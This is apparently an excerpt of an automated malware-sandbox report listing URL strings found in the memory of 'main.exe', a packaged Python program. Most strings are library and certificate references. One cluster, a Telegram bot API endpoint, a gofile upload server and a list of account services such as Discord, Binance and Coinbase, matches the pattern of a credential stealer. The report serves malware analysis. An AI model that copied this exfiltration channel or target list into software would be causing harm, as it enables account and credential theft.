Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008768260.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014545215.000001E894834000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024403480.000001E89483A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/oX
Source: main.exe, 00000002.00000003.1785741511.000001E89399B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: main.exe, 00000002.00000003.1998028650.000001E894BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dabeaz.com/ply)F
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008768260.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014545215.000001E894834000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025023723.000001E894A33000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024403480.000001E89483A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: main.exe, 00000002.00000002.2023726848.000001E894776000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981062984.000001E894776000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opensource.org/licenses/mit-license.phptrols
Source: main.exe, 00000002.00000003.1785741511.000001E89399B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: main.exe, 00000002.00000003.1973010642.000001E893B75000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994855674.000001E893BCE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973747012.000001E893B97000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980969299.000001E893BCC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893BBE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020621648.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974563806.000001E893BAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: main.exe, 00000002.00000003.1972971253.000001E894B59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B97000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995890221.000001E894B91000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001942358.000001E894B96000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994813697.000001E894B65000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988603631.000001E894B5A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2000928411.000001E894B94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999790969.000001E893AD7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981303330.000001E893A9B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997398066.000001E893A9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999906974.000001E893ADF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979378962.000001E893A63000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986060081.000001E893A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022722269.000001E894613000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002779411.000001E894613000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999364287.000001E894613000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aliexpress.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/servers
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/botp
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://binance.com)
Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue44497.
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://coinbase.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crunchyroll.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com)
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.gg/pallets
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://disney.com)
Source: main.exe, 00000002.00000003.2008146184.000001E8936B4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981959975.000001E89369F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793761731.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981084453.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982725593.000001E8936B3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976651882.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981251684.000001E893699000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982367230.000001E8936A6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1789469075.000001E893698000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787609743.000001E893698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: main.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: main.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: main.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: main.exe, 00000002.00000003.1975331009.000001E893501000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980293973.000001E893502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: main.exe, 00000002.00000003.1979666103.000001E8939E9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E8939F8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982059163.000001E8939EE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987528082.000001E8939F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984054418.000001E8939EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/pprint.html
Source: main.exe, 00000002.00000003.1980146595.000001E8939B3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979666103.000001E8939E9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E8939F8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982059163.000001E8939EE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987528082.000001E8939F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977996785.000001E8939B0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976495976.000001E89398C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978801071.000001E8939B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984054418.000001E8939EF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002704970.000001E8939B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/pprint.html#pprint.pprint
Source: main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A01000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A04000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020045883.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012429799.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996321903.000001E893968000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/re.html
Source: main.exe, 00000002.00000003.1793009900.000001E893AAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ebay.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://epicgames.com)
Source: main.exe, 00000002.00000003.1982648844.000001E894B39000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988603631.000001E894B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exiv2.orA
Source: main.exe, 00000002.00000003.1981902344.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1992755022.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://exiv2.org/tags.html)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://expressvpn.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://expressvpn.com)P
Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com)
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E8947F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: main.exe, 00000000.00000003.1752729643.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mhammond/pywin32
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pallets/markupsafe/
Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/psf/requests/pull/6710
Source: main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packaging
Source: main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/packaging02d2
Source: main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
Source: main.exe, 00000002.00000003.1976495976.000001E89398C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998205963.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyparsing/pyparsing/wiki
Source: main.exe, 00000002.00000002.2027115983.000001E895370000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python-pillow/Pillow/
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777434520.000001E89154A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: main.exe, 00000002.00000003.1781941357.000001E8933CD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975282383.000001E893359000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977491655.000001E89338A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1781656560.000001E893672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
